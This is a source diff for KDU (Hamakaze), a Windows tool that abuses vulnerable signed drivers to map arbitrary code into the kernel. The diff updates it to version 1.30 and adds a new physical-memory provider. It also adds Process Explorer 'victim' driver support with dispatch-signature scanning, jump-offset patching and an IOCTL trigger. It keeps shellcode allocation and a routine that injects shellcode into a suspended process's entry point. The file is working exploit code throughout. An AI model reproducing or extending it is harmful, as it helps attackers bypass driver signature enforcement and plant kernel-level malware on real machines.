+1880,7 @@ PVOID ScAllocate( // Build initial loader code part. // if (!ScBuildInitCodeForVersion(ShellVersion, pvShellCode)) { - VirtualFree(pvShellCode, 0, MEM_RELEASE); + ScFree(pvShellCode, scSize); return NULL; } @@ -1914,7 +1921,7 @@ PVOID ScAllocate( KernelBase, KernelImage)) { - VirtualFree(pvShellCode, 0, MEM_RELEASE); + ScFree(pvShellCode, scSize); supPrintfEvent(kduEventError, "[!] Failed to resolve base shellcode import\r\n"); diff --git a/Source/Hamakaze/shellcode.h b/Source/Hamakaze/shellcode.h index 9b81b9b..4717d02 100644 --- a/Source/Hamakaze/shellcode.h +++ b/Source/Hamakaze/shellcode.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: SHELLCODE.H * -* VERSION: 1.20 +* VERSION: 1.30 * -* DATE: 15 Feb 2022 +* DATE: 20 Mar 2023 * * Default driver mapping shellcode(s) prototypes and definitions. * @@ -64,11 +64,11 @@ typedef struct _PAYLOAD_HEADER_V3 { } PAYLOAD_HEADER_V3, * PPAYLOAD_HEADER_V3; SIZE_T ScGetViewSize( - _In_ ULONG ShellVersion, - _In_ PVOID ShellCodePtr); + _In_ ULONG ScVersion, + _In_ PVOID ScBuffer); DWORD ScSizeOf( - _In_ ULONG ShellVersion, + _In_ ULONG ScVersion, _Out_opt_ PULONG PayloadSize); ULONG ScSizeOfProc( @@ -79,8 +79,8 @@ BOOLEAN ScCreateFixedUnicodeString( _In_ PCWSTR SourceString); HANDLE ScCreateReadyEvent( - _In_ ULONG ShellVersion, - _In_ PVOID ShellPtr); + _In_ ULONG ScVersion, + _In_ PVOID ScBuffer); BOOLEAN ScStoreVersionSpecificData( _In_ PKDU_CONTEXT Context, @@ -102,7 +102,8 @@ PVOID ScGetBootstrapLdr( _Out_opt_ PULONG Size); VOID ScFree( - _In_ PVOID ShellPtr); + _In_ PVOID ScBuffer, + _In_ ULONG ScSize); PVOID ScAllocate( _In_ ULONG ShellVersion, diff --git a/Source/Hamakaze/sig.h b/Source/Hamakaze/sig.h index cf80a4c..0ff541e 100644 --- a/Source/Hamakaze/sig.h +++ b/Source/Hamakaze/sig.h @@ -1,14 +1,14 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: SIG.H * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * -* Signatures header file. +* Signatures definition header file. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -21,7 +21,8 @@ // // Process Explorer dispatch signature. // -static unsigned char ProcExpSignature[] = { + +static unsigned char g_ProcExpSig[] = { 0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xFA, 0x33, 0xDB, 0x48, 0x8B, 0xD1, 0x48, 0x8B, 0x8F, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x47, 0x18, 0x48, diff --git a/Source/Hamakaze/sup.cpp b/Source/Hamakaze/sup.cpp index be8f946..7fe4fd2 100644 --- a/Source/Hamakaze/sup.cpp +++ b/Source/Hamakaze/sup.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: SUP.CPP * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 07 Dec 2022 +* DATE: 20 Mar 2023 * * Program global support routines. * @@ -597,6 +597,27 @@ BOOL supRegDeleteKeyRecursive( return supxDeleteKeyRecursive(hKeyRoot, szKeyName); } +/* +* supRegWriteValueDWORD +* +* Purpose: +* +* Write DWORD value to the registry. +* +*/ +NTSTATUS supRegWriteValueDWORD( + _In_ HANDLE RegistryHandle, + _In_ LPCWSTR ValueName, + _In_ DWORD ValueData +) +{ + UNICODE_STRING valueName; + + RtlInitUnicodeString(&valueName, ValueName); + return NtSetValueKey(RegistryHandle, &valueName, 0, REG_DWORD, + (PVOID)&ValueData, sizeof(DWORD)); +} + /* * supRegWriteValueString * @@ -913,7 +934,7 @@ NTSTATUS supOpenDriverEx( 0, 0, FILE_OPEN, - 0, + FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); @@ -2320,7 +2341,7 @@ PVOID supGetEntryPointForMappedFile( */ NTSTATUS supInjectPayload( _In_ PVOID pvTargetImage, - _In_ PVOID pvShellCode, + _In_ PVOID pbShellCode, _In_ ULONG cbShellCode, _In_ LPWSTR lpTargetModule, _Out_ PHANDLE phZombieProcess @@ -2467,7 +2488,7 @@ NTSTATUS supInjectPayload( } RtlCopyMemory(RtlOffsetToPointer(pvLocalBase, optHeader->AddressOfEntryPoint), - pvShellCode, + pbShellCode, cbShellCode); ResumeThread(processInfo.hThread); diff --git a/Source/Hamakaze/sup.h b/Source/Hamakaze/sup.h index 635a2ce..af98776 100644 --- a/Source/Hamakaze/sup.h +++ b/Source/Hamakaze/sup.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: SUP.H * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 21 Nov 2022 +* DATE: 20 Mar 2023 * * Support routines header file. * @@ -235,6 +235,11 @@ BOOL supManageDummyDll( ULONG supSelectNonPagedPoolTag( VOID); +NTSTATUS supRegWriteValueDWORD( + _In_ HANDLE RegistryHandle, + _In_ LPCWSTR ValueName, + _In_ DWORD ValueData); + NTSTATUS supRegWriteValueString( _In_ HANDLE RegistryHandle, _In_ LPCWSTR ValueName, @@ -293,7 +298,7 @@ PVOID supGetEntryPointForMappedFile( NTSTATUS supInjectPayload( _In_ PVOID pvTargetImage, - _In_ PVOID pvShellCode, + _In_ PVOID pbShellCode, _In_ ULONG cbShellCode, _In_ LPWSTR lpTargetModule, _Out_ PHANDLE phZombieProcess); diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp index fa64147..80d60bd 100644 --- a/Source/Hamakaze/tests.cpp +++ b/Source/Hamakaze/tests.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: TESTS.CPP * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * KDU tests. * @@ -89,20 +89,19 @@ BOOL WINAPI TestPhysMemEnumCallback( { PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext; - PKDU_CONTEXT Context = Params->Context; - ULONG signatureSize = sizeof(ProcExpSignature); + ULONG signatureSize = Params->DispatchSignatureLength; BYTE buffer[PAGE_SIZE]; RtlSecureZeroMemory(&buffer, sizeof(buffer)); - if (Context->Provider->Callbacks.ReadPhysicalMemory(Context->DeviceHandle, + if (Params->ReadPhysicalMemory(Params->DeviceHandle, Address, &buffer, PAGE_SIZE)) { - if (signatureSize == RtlCompareMemory(ProcExpSignature, - RtlOffsetToPointer(buffer, PE152_DISPATCH_PAGE_OFFSET), + if (signatureSize == RtlCompareMemory(Params->DispatchSignature, + RtlOffsetToPointer(buffer, Params->DispatchHandlerPageOffset), signatureSize)) { printf_s("\t Found code at address 0x%llX\r\n", Address); @@ -117,10 +116,16 @@ VOID TestBrute(PKDU_CONTEXT Context) { KDU_PHYSMEM_ENUM_PARAMS params; + params.DeviceHandle = Context->DeviceHandle; + params.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory; + params.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory; + + params.DispatchSignature = Context->Victim->Data.DispatchSignature; + params.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength; + params.bWrite = FALSE; params.cbPayload = 0; params.pvPayload = NULL; - params.Context = Context; params.ccPagesFound = 0; params.ccPagesModified = 0; @@ -141,7 +146,7 @@ VOID KDUTest() RtlSecureZeroMemory(&Buffer, sizeof(Buffer)); - Context = KDUProviderCreate(KDU_PROVIDER_AMD_RYZENMASTER, + Context = KDUProviderCreate(KDU_PROVIDER_HR_PHYSMEM, FALSE, NT_WIN7_SP1, KDU_SHELLCODE_V1, diff --git a/Source/Hamakaze/victim.cpp b/Source/Hamakaze/victim.cpp index fb0dc7b..e6db1b9 100644 --- a/Source/Hamakaze/victim.cpp +++ b/Source/Hamakaze/victim.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2018 - 2022 +* (C) COPYRIGHT AUTHORS, 2018 - 2023 * * TITLE: VICTIM.CPP * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * Victim support routines. * @@ -30,10 +30,12 @@ BOOL VpCreate( _Inout_ PKDU_VICTIM_PROVIDER Context, _In_opt_ HINSTANCE ModuleBase, - _Out_opt_ PHANDLE VictimHandle + _Out_opt_ PHANDLE VictimHandle, + _In_opt_ pfnLoadDriverCallback Callback, + _In_opt_ PVOID CallbackParam ) { - supPrintfEvent(kduEventInformation, + supPrintfEvent(kduEventInformation, "[+] Processing victim \"%ws\" driver\r\n", Context->Desc); @@ -42,7 +44,10 @@ BOOL VpCreate( Context->Name, Context->ResourceId, Context->DesiredAccess, - VictimHandle); + VictimHandle, + &Context->Data.VictimImage, + Callback, + CallbackParam); } /* @@ -67,7 +72,10 @@ BOOL VpRelease( *VictimHandle = NULL; } } - + + if (Context->Data.VictimImage) + VirtualFree(Context->Data.VictimImage, 0, MEM_RELEASE); + return Context->Callbacks.Release(Context->Name); } @@ -84,8 +92,8 @@ VOID VpExecutePayload( _Out_opt_ PHANDLE VictimHandle ) { - Context->Callbacks.Execute(Context->Name, - Context->DesiredAccess, + Context->Callbacks.Execute(Context->Name, + Context->DesiredAccess, VictimHandle); } @@ -98,12 +106,14 @@ VOID VpExecutePayload( * This routine will try to force unload driver on loading if Force parameter set to TRUE. * */ -BOOL VppLoadUnloadDriver( +NTSTATUS VppLoadUnloadDriver( _In_ LPCWSTR Name, _In_ LPCWSTR ImagePath, _In_ BOOLEAN Force, _In_ BOOLEAN Unload, - _Out_opt_ NTSTATUS* ErrorStatus) + _In_opt_ pfnLoadDriverCallback Callback, + _In_opt_ PVOID CallbackParam + ) { NTSTATUS ntStatus; @@ -111,13 +121,10 @@ BOOL VppLoadUnloadDriver( ntStatus = supUnloadDriver(Name, TRUE); } else { - ntStatus = supLoadDriver(Name, ImagePath, Force); + ntStatus = supLoadDriverEx(Name, ImagePath, Force, Callback, CallbackParam); } - if (ErrorStatus) - *ErrorStatus = ntStatus; - - return (NT_SUCCESS(ntStatus)); + return ntStatus; } /* @@ -165,8 +172,14 @@ BOOL VpCreateCallback( _In_ LPCWSTR Name, //same as device name _In_ ULONG ResourceId, _In_ ACCESS_MASK DesiredAccess, - _Out_opt_ PHANDLE VictimHandle) + _Out_opt_ PHANDLE VictimHandle, + _Out_opt_ PVOID* VictimImage, + _In_opt_ pfnLoadDriverCallback Callback, + _In_opt_ PVOID CallbackParam +) { + BOOL bResult = FALSE; + NTSTATUS ntStatus; PBYTE drvBuffer = NULL; ULONG resourceSize = 0; LPWSTR driverFileName = NULL; @@ -174,37 +187,45 @@ BOOL VpCreateCallback( if (VictimHandle) *VictimHandle = NULL; + if (VictimImage) + *VictimImage = NULL; driverFileName = VppBuildDriverName(Name); if (driverFileName) { do { - + if (supIsObjectExists((LPWSTR)L"\\Device", Name)) { - - supPrintfEvent(kduEventError, + + supPrintfEvent(kduEventError, "[!] Victim driver already loaded, force reload\r\n"); - supPrintfEvent(kduEventError, + supPrintfEvent(kduEventError, "[!] Attempt to unload %ws\r\n", Name); - NTSTATUS ntStatus; - if (!VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, &ntStatus)) { - - supPrintfEvent(kduEventError, - "[!] Could not force unload victim, NTSTATUS(0x%lX) abort\r\n", + ntStatus = VppLoadUnloadDriver(Name, + driverFileName, + FALSE, + TRUE, + NULL, + NULL); + + if (!NT_SUCCESS(ntStatus)) + { + supPrintfEvent(kduEventError, + "[!] Could not force unload victim, NTSTATUS(0x%lX) abort\r\n", ntStatus); - + break; } else { - supPrintfEvent(kduEventInformation, + supPrintfEvent(kduEventInformation, "[+] Previous instance of victim driver unloaded\r\n"); } } - drvBuffer = (PBYTE)KDULoadResource(ResourceId, - ModuleBase, + drvBuffer = (PBYTE)KDULoadResource(ResourceId, + ModuleBase, &resourceSize, PROVIDER_RES_KEY, TRUE); @@ -214,7 +235,25 @@ BOOL VpCreateCallback( break; } - NTSTATUS ntStatus; + if (VictimImage) { + + DWORD vSize = 0; + PVOID vpImage = PELoaderLoadImage(drvBuffer, &vSize); + + if (vpImage == NULL) { + + supPrintfEvent(kduEventError, + "[!] Could not map victim image, abort\r\n"); + + SetLastError(ERROR_INTERNAL_ERROR); + break; + } + + printf_s("[+] Mapped victim image at %p with size 0x%lX bytes\r\n", vpImage, vSize); + + *VictimImage = vpImage; + } + ULONG writeBytes; printf_s("[+] Extracting victim driver \"%ws\" as \"%ws\"\r\n", Name, driverFileName); @@ -234,28 +273,34 @@ BOOL VpCreateCallback( // Driver is in use. // if (ntStatus == STATUS_SHARING_VIOLATION) { - supPrintfEvent(kduEventError, + supPrintfEvent(kduEventError, "[!] Sharing violation, driver maybe in use, please close all application(s) that are using this driver\r\n"); } else { supPrintfEvent(kduEventError, "[!] Could not extract victim driver, NTSTATUS(0x%lX) abort\r\n", - ntStatus); - + ntStatus); + } SetLastError(RtlNtStatusToDosError(ntStatus)); break; } - ntStatus = STATUS_UNSUCCESSFUL; - if (VppLoadUnloadDriver(Name, driverFileName, TRUE, FALSE, &ntStatus)) { + ntStatus = VppLoadUnloadDriver(Name, + driverFileName, + TRUE, + FALSE, + Callback, + CallbackParam); - SetLastError(RtlNtStatusToDosError(ntStatus)); + if (NT_SUCCESS(ntStatus)) { + + SetLastError(ERROR_SUCCESS); if (VictimHandle) { - + ntStatus = supOpenDriver(Name, DesiredAccess, &deviceHandle); if (NT_SUCCESS(ntStatus)) { *VictimHandle = deviceHandle; @@ -265,6 +310,8 @@ BOOL VpCreateCallback( } } + bResult = TRUE; + } else { SetLastError(RtlNtStatusToDosError(ntStatus)); @@ -275,7 +322,7 @@ BOOL VpCreateCallback( supHeapFree(driverFileName); } - return (deviceHandle != NULL); + return bResult; } /* @@ -294,7 +341,7 @@ BOOL VpReleaseCallback( LPWSTR driverFileName = VppBuildDriverName(Name); if (driverFileName) { - bResult = VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, NULL); + bResult = NT_SUCCESS(VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, NULL, NULL)); DeleteFile(driverFileName); supHeapFree(driverFileName); } @@ -319,6 +366,32 @@ VOID VpExecuteCallback( supOpenDriver(Name, DesiredAccess, VictimHandle); } +/* +* VpExecuteCallbackEx +* +* Purpose: +* +* Execute victim payload by IOCTL call. +* +*/ +VOID VpExecuteCallbackEx( + _In_ LPCWSTR Name, + _In_ ACCESS_MASK DesiredAccess, + _Out_ PHANDLE VictimHandle +) +{ + HANDLE victimHandle = NULL; + ULONG dummy = 0; + + if (NT_SUCCESS(supOpenDriver(Name, DesiredAccess, &victimHandle))) { + + supCallDriver(victimHandle, 0xBADDAB, &dummy, sizeof(dummy), &dummy, sizeof(dummy)); + + } + + *VictimHandle = victimHandle; +} + /* * VppOpenExistingDriverDevice * @@ -395,10 +468,51 @@ BOOL VpCreateFromExistingCallback( _In_ LPCWSTR Name, _In_ ULONG ResourceId, _In_ ACCESS_MASK DesiredAccess, - _Out_opt_ PHANDLE VictimHandle) + _Out_opt_ PHANDLE VictimHandle, + _Out_opt_ PVOID* VictimImage, + _In_opt_ pfnLoadDriverCallback Callback, + _In_opt_ PVOID CallbackParam) { UNREFERENCED_PARAMETER(ModuleBase); UNREFERENCED_PARAMETER(ResourceId); + UNREFERENCED_PARAMETER(Callback); + UNREFERENCED_PARAMETER(CallbackParam); + + if (VictimHandle) *VictimHandle = NULL; + + if (VictimImage) { + + *VictimImage = NULL; + + DWORD resourceSize = 0; + PBYTE drvBuffer = (PBYTE)KDULoadResource(ResourceId, + ModuleBase, + &resourceSize, + PROVIDER_RES_KEY, + TRUE); + + if (drvBuffer == NULL) { + SetLastError(ERROR_FILE_NOT_FOUND); + return FALSE; + } + + DWORD vSize = 0; + PVOID vpImage = PELoaderLoadImage(drvBuffer, &vSize); + + if (vpImage == NULL) { + + supPrintfEvent(kduEventError, + "[!] Could not map victim image, abort\r\n"); + + SetLastError(ERROR_INTERNAL_ERROR); + return FALSE; + } + + printf_s("[+] Mapped victim image at %p with size 0x%lX bytes\r\n", vpImage, vSize); + + *VictimImage = vpImage; + + } return VppOpenExistingDriverDevice(Name, DesiredAccess, VictimHandle); } @@ -419,3 +533,179 @@ BOOL VpReleaseCallbackStub( return TRUE; } + +/* +* VpLoadDriverCallback +* +* Purpose: +* +* supLoadDriverEx callback to store specific data in registry entry. +* +*/ +NTSTATUS CALLBACK VpLoadDriverCallback( + _In_ PUNICODE_STRING RegistryPath, + _In_opt_ PVOID Param +) +{ + NTSTATUS ntStatus = STATUS_SUCCESS; + VICTIM_LOAD_PARAMETERS* params; + + UNREFERENCED_PARAMETER(RegistryPath); + + if (Param == NULL) + return STATUS_INVALID_PARAMETER_2; + + params = (VICTIM_LOAD_PARAMETERS*)Param; + + switch (params->Provider->VictimId) { + case KDU_VICTIM_PE1627: + case KDU_VICTIM_PE1702: + default: + break; + } + + return ntStatus; +} + +/* +* VpQueryInformation +* +* Purpose: +* +* Query various victim information. +* +*/ +_Success_(return != FALSE) +BOOL VpQueryInformation( + _In_ PKDU_VICTIM_PROVIDER Context, + _In_ VICTIM_INFORMATION VictimInformationClass, + _Inout_ PVOID Information, + _In_ ULONG InformationLength) +{ + BOOL bResult = TRUE; + PVICTIM_IMAGE_INFORMATION imageInfo; + PVICTIM_DRIVER_INFORMATION driverInfo; + + PVOID dispatchSignature = 0; + ULONG signatureSize = 0; + + PVOID sectionBase; + ULONG sectionSize; + + switch (VictimInformationClass) { + + case VictimImageInformation: + + if (InformationLength == sizeof(VICTIM_IMAGE_INFORMATION)) { + + imageInfo = (VICTIM_IMAGE_INFORMATION*)Information; + + dispatchSignature = Context->Data.DispatchSignature; + signatureSize = Context->Data.DispatchSignatureLength; + + sectionBase = ntsupLookupImageSectionByName((CHAR*)TEXT_SECTION, + TEXT_SECTION_LEGNTH, + (PVOID)Context->Data.VictimImage, + §ionSize); + + if (sectionBase && sectionSize) { + + PBYTE ptrCode = NULL; + + ptrCode = (PBYTE)ntsupFindPattern((PBYTE)sectionBase, + sectionSize, + (PBYTE)dispatchSignature, + signatureSize); + + if (ptrCode) { + imageInfo->DispatchOffset = (ULONG_PTR)ptrCode & 0xffff; + imageInfo->DispatchPageOffset = imageInfo->DispatchOffset & 0xfff; + + LONG_PTR rel = (LONG_PTR)sectionBase - (LONG_PTR)ptrCode - 5; + + imageInfo->JumpValue = (ULONG)rel; + } + else { + SetLastError(ERROR_NOT_FOUND); + bResult = FALSE; + } + + } + else { + SetLastError(ERROR_SECTION_NOT_FOUND); + bResult = FALSE; + } + + } + else { + SetLastError(ERROR_INVALID_PARAMETER); + bResult = FALSE; + } + + break; + + case VictimDriverInformation: + + if (InformationLength == sizeof(VICTIM_DRIVER_INFORMATION)) { + + driverInfo = (VICTIM_DRIVER_INFORMATION*)Information; + + PRTL_PROCESS_MODULE_INFORMATION target; + PRTL_PROCESS_MODULES modulesList = (PRTL_PROCESS_MODULES)supGetLoadedModulesList(FALSE, NULL); + if (modulesList) { + + ANSI_STRING driverNameAs; + UNICODE_STRING driverNameUs; + + WCHAR szTargetDriver[MAX_PATH]; + + StringCchPrintf(szTargetDriver, MAX_PATH, L"%ws.sys", Context->Name); + RtlInitUnicodeString(&driverNameUs, szTargetDriver); + + driverNameAs.Buffer = NULL; + driverNameAs.Length = driverNameAs.MaximumLength = 0; + + NTSTATUS ntStatus; + + ntStatus = RtlUnicodeStringToAnsiString(&driverNameAs, &driverNameUs, TRUE); + if (NT_SUCCESS(ntStatus) && driverNameAs.Buffer) { + + target = (PRTL_PROCESS_MODULE_INFORMATION)ntsupFindModuleEntryByName(modulesList, driverNameAs.Buffer); + if (target) { + driverInfo->LoadedImageBase = (ULONG_PTR)target->ImageBase; + driverInfo->ImageSize = target->ImageSize; + } + + RtlFreeAnsiString(&driverNameAs); + } + else { + SetLastError(RtlNtStatusToDosError(ntStatus)); + bResult = FALSE; + } + supHeapFree(modulesList); + } + else { + SetLastError(ERROR_INTERNAL_ERROR); + bResult = FALSE; + } + } + else { + SetLastError(ERROR_INVALID_PARAMETER); + bResult = FALSE; + } + + break; + + case VictimRopChainInformation: + UNREFERENCED_PARAMETER(Information); + bResult = FALSE; + break; + + default: + UNREFERENCED_PARAMETER(Information); + bResult = FALSE; + break; + } + + return bResult; +} diff --git a/Source/Hamakaze/victim.h b/Source/Hamakaze/victim.h index 3fb2f0c..f6acae0 100644 --- a/Source/Hamakaze/victim.h +++ b/Source/Hamakaze/victim.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2018 - 2022 +* (C) COPYRIGHT AUTHORS, 2018 - 2023 * * TITLE: VICTIM.H * -* VERSION: 1.20 +* VERSION: 1.30 * -* DATE: 08 Feb 2022 +* DATE: 20 Mar 2023 * * Victim support prototypes and definitions. * @@ -24,7 +24,10 @@ typedef BOOL(WINAPI* pfnVictimCreate)( _In_ LPCWSTR Name, _In_ ULONG ResourceId, _In_ ACCESS_MASK DesiredAccess, - _Out_opt_ PHANDLE VictimHandle + _Out_opt_ PHANDLE VictimHandle, + _Out_opt_ PVOID *VictimImage, + _In_opt_ pfnLoadDriverCallback Callback, + _In_opt_ PVOID CallbackParam ); typedef BOOL(WINAPI* pfnVictimRelease)( @@ -37,6 +40,28 @@ typedef VOID(WINAPI* pfnVictimExecute)( _Out_opt_ PHANDLE VictimHandle ); +typedef enum _VICTIM_INFORMATION { + VictimImageInformation = 0, + VictimDriverInformation, + VictimRopChainInformation, + MaxVictimInformation +} VICTIM_INFORMATION; + +typedef struct _VICTIM_IMAGE_INFORMATION { + ULONG DispatchOffset; + ULONG DispatchPageOffset; + ULONG JumpValue; +} VICTIM_IMAGE_INFORMATION, * PVICTIM_IMAGE_INFORMATION; + +typedef struct _VICTIM_DRIVER_INFORMATION { + ULONG_PTR LoadedImageBase; + ULONG ImageSize; +} VICTIM_DRIVER_INFORMATION, * PVICTIM_DRIVER_INFORMATION; + +typedef struct _VICTIM_LOAD_PARAMETERS { + struct _KDU_VICTIM_PROVIDER *Provider; +} VICTIM_LOAD_PARAMETERS, * PVICTIM_LOAD_PARAMETERS; + // // No optional victim flags specified, this is default value. // @@ -51,6 +76,7 @@ typedef struct _KDU_VICTIM_PROVIDER { LPCWSTR Name; //same as device name LPCWSTR Desc; //optional ULONG ResourceId; + ULONG VictimId; ACCESS_MASK DesiredAccess; union { ULONG Flags; @@ -64,12 +90,21 @@ typedef struct _KDU_VICTIM_PROVIDER { pfnVictimRelease Release; pfnVictimExecute Execute; } Callbacks; + + struct { + PVOID DispatchSignature; + ULONG DispatchSignatureLength; + PVOID VictimImage; + } Data; + } KDU_VICTIM_PROVIDER, * PKDU_VICTIM_PROVIDER; BOOL VpCreate( _Inout_ PKDU_VICTIM_PROVIDER Context, _In_opt_ HINSTANCE ModuleBase, - _Out_opt_ PHANDLE VictimHandle); + _Out_opt_ PHANDLE VictimHandle, + _In_opt_ pfnLoadDriverCallback Callback, + _In_opt_ PVOID CallbackParam); BOOL VpRelease( _In_ PKDU_VICTIM_PROVIDER Context, @@ -84,7 +119,10 @@ BOOL VpCreateCallback( _In_ LPCWSTR Name, _In_ ULONG ResourceId, _In_ ACCESS_MASK DesiredAccess, - _Out_opt_ PHANDLE VictimHandle); + _Out_opt_ PHANDLE VictimHandle, + _Out_opt_ PVOID* VictimImage, + _In_opt_ pfnLoadDriverCallback Callback, + _In_opt_ PVOID CallbackParam); BOOL VpReleaseCallback( _In_ LPCWSTR Name); @@ -99,12 +137,31 @@ BOOL VpCreateFromExistingCallback( _In_ LPCWSTR Name, _In_ ULONG ResourceId, _In_ ACCESS_MASK DesiredAccess, - _Out_opt_ PHANDLE VictimHandle); + _Out_opt_ PHANDLE VictimHandle, + _Out_opt_ PVOID* VictimImage, + _In_opt_ pfnLoadDriverCallback Callback, + _In_opt_ PVOID CallbackParam); VOID VpExecuteFromExistingCallback( _In_ LPCWSTR Name, _In_ ACCESS_MASK DesiredAccess, _Out_ PHANDLE VictimHandle); +VOID VpExecuteCallbackEx( + _In_ LPCWSTR Name, + _In_ ACCESS_MASK DesiredAccess, + _Out_ PHANDLE VictimHandle); + BOOL VpReleaseCallbackStub( _In_ LPCWSTR Name); + +NTSTATUS CALLBACK VpLoadDriverCallback( + _In_ PUNICODE_STRING RegistryPath, + _In_opt_ PVOID Param); + +_Success_(return != FALSE) +BOOL VpQueryInformation( + _In_ PKDU_VICTIM_PROVIDER Context, + _In_ VICTIM_INFORMATION VictimInformationClass, + _Inout_ PVOID Information, + _In_ ULONG InformationLength); diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h index 54934e1..d5c2138 100644 --- a/Source/Shared/consts.h +++ b/Source/Shared/consts.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: CONSTS.H * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * Global consts. * @@ -20,9 +20,9 @@ #pragma once #define KDU_VERSION_MAJOR 1 -#define KDU_VERSION_MINOR 2 -#define KDU_VERSION_REVISION 8 -#define KDU_VERSION_BUILD 2212 +#define KDU_VERSION_MINOR 3 +#define KDU_VERSION_REVISION 0 +#define KDU_VERSION_BUILD 2303 #define KDU_MIN_NTBUILDNUMBER 0x1DB1 //Windows 7 SP1 #define KDU_MAX_NTBUILDNUMBER 0xFFFFFFFF //Undefined @@ -34,7 +34,8 @@ #define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS" #define PROCEXP152 L"PROCEXP152" -#define PROCEXP_DESC L"Process Explorer" +#define PROCEXP1627_DESC L"Process Explorer v16" +#define PROCEXP1702_DESC L"Process Explorer v17" #define NTOSKRNL_EXE L"ntoskrnl.exe" #define CI_DLL L"CI.dll" @@ -59,11 +60,19 @@ #define SYSTEM_PID_MAGIC 4 -#define PE152_DISPATCH_OFFSET 0x2220 // Valid only for 1.5.2 -#define PE152_DISPATCH_PAGE_OFFSET 0x0220 +#define TEXT_SECTION ".text" +#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION) #define SHELLCODE_SMALL 0x200 +// +// Victim providers id table +// +#define KDU_VICTIM_PE1627 0 +#define KDU_VICTIM_PE1702 1 +#define KDU_VICTIM_MAX 2 +#define KDU_VICTIM_DEFAULT KDU_VICTIM_PE1702 + // // Data id table // @@ -76,7 +85,8 @@ // // Driver id table // -#define IDR_PROCEXP 100 +#define IDR_PROCEXP1627 2000 +#define IDR_PROCEXP1702 2001 #define IDR_INTEL_NAL 103 #define IDR_RTCORE64 105 #define IDR_GDRV 106 @@ -107,7 +117,7 @@ #define IDR_ASROCKDRV 131 #define IDR_ALSYSIO64 132 #define IDR_AMD_RYZENMASTER 133 -#define IDR_RESERVED0 134 +#define IDR_PHYSMEM 134 #define IDR_RESERVED1 135 #define IDR_RESERVED2 136 #define IDR_RESERVED3 137 @@ -148,6 +158,9 @@ #define KDU_PROVIDER_ASROCK 28 #define KDU_PROVIDER_ALCPU 29 #define KDU_PROVIDER_AMD_RYZENMASTER 30 +#define KDU_PROVIDER_HR_PHYSMEM 31 + +#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL // // KDU provider flags @@ -200,6 +213,12 @@ // #define KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE 0x00000080 +// +// When provider support both virtual/physical memory acccess. +// +#define KDUPROV_FLAGS_PREFER_PHYSICAL 0x00000100 +#define KDUPROV_FLAGS_PREFER_VIRTUAL 0x00000200 + // // KDU shellcode support flags // diff --git a/Source/Shared/kdubase.h b/Source/Shared/kdubase.h index 71cce52..8dd690b 100644 --- a/Source/Shared/kdubase.h +++ b/Source/Shared/kdubase.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2022 +* (C) COPYRIGHT AUTHORS, 2022 - 2023 * * TITLE: KDUBASE.H * -* VERSION: 1.27 +* VERSION: 1.30 * -* DATE: 10 Nov 2022 +* DATE: 20 Mar 2023 * * Base KDU definitions. * @@ -36,6 +36,7 @@ typedef struct _KDU_DB_ENTRY { ULONG MaxNtBuildNumberSupport; ULONG ResourceId; ULONG ProviderId; + ULONG VictimId; KDU_SOURCEBASE DrvSourceBase; union { ULONG Flags; @@ -48,7 +49,9 @@ typedef struct _KDU_DB_ENTRY { ULONG PML4FromLowStub : 1; ULONG NoVictim : 1; ULONG PhysMemoryBruteForce : 1; - ULONG Reserved : 24; + ULONG PreferPhysical : 1; + ULONG PreferVirtual : 1; + ULONG Reserved : 22; }; }; 